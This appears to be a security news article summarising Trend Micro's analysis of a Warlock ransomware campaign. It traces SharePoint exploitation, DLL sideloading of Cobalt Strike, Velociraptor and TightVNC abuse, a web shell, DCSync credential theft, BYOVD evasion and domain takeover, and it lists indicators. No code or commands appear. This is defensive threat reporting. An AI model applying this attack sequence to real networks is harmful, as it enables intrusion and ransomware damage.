Warlock Attack Chain Dissected: SharePoint Exploits, BYOVD, and Ransomware Deployment
Trend Micro reveals a sophisticated Warlock attack chain exploiting SharePoint vulnerabilities, using BYOVD and legitimate tools like TightVNC and Velociraptor for persistence and lateral movement.
Trend Micro researchers have published a detailed analysis of a Warlock attack chain that demonstrates an expanded toolset and improved evasion capabilities. The campaign, which exploits Microsoft SharePoint vulnerabilities for initial access, employs a persistent Bring Your Own Vulnerable Driver (BYOVD) technique, legitimate remote access tools, and culminates in ransomware deployment. The findings highlight the group's ability to blend malicious activity with trusted software to evade detection.
Initial access is achieved through Microsoft SharePoint vulnerabilities, with the attackers timing their activity to coincide with holiday periods when staffing and monitoring are reduced. Trend Micro's telemetry traced the earliest malicious activity to the SharePoint worker process (w3wp.exe), which spawned a Cobalt Strike beacon agent using DLL-sideloading. The legitimate binary MsMpSrv.exe (originally cookie_exporter.exe) sideloads a malicious MsEdge.dll, establishing a connection to the command-and-control server at code[.]translatevv[.]com. A second tool, EndProcess.exe, was dropped to terminate security products.
Approximately two weeks later, a second wave of activity was observed on the same compromised server. The attackers used msiexec.exe to silently download and install a remote MSI payload hosted on Supabase cloud storage, a legitimate platform, to evade network-level detections. This payload was later verified as the legitimate DFIR tool Velociraptor, repurposed for C&C. A web shell named cproxy.aspx was then written to the IIS/SharePoint environment, confirming post-exploitation persistence.
For credential access, the attackers executed commands invoking the Windows Credential Manager interface and conducted DCSync attacks using a tool named debug.exe to impersonate a Domain Controller and retrieve user credentials. Lateral movement was extensive, involving PsExec, TightVNC, PowerShell Remoting, and an RDP Patcher to enable concurrent sessions. The attackers gained control of the Domain Controller, reset the built-in Administrator password, and added a domain user to the Domain Administrators group, achieving full domain compromise.
The command-and-control infrastructure relied heavily on legitimate tools. Velociraptor (version 0.73.4) was abused as a primary C&C framework, while the BYOVD technique leveraged the NSec driver for persistence and defense evasion. The attack chain demonstrates a sophisticated blend of living-off-the-land binaries, legitimate software, and custom tools to maintain stealth and achieve their objectives.
This analysis underscores the evolving tactics of the Warlock group, which continues to refine its methods to bypass security controls. The use of trusted platforms like Supabase and legitimate tools like Velociraptor and TightVNC makes detection challenging. Organizations are advised to monitor for unusual SharePoint activity, enforce strict application allowlisting, and implement robust detection rules for BYOVD techniques and lateral movement patterns.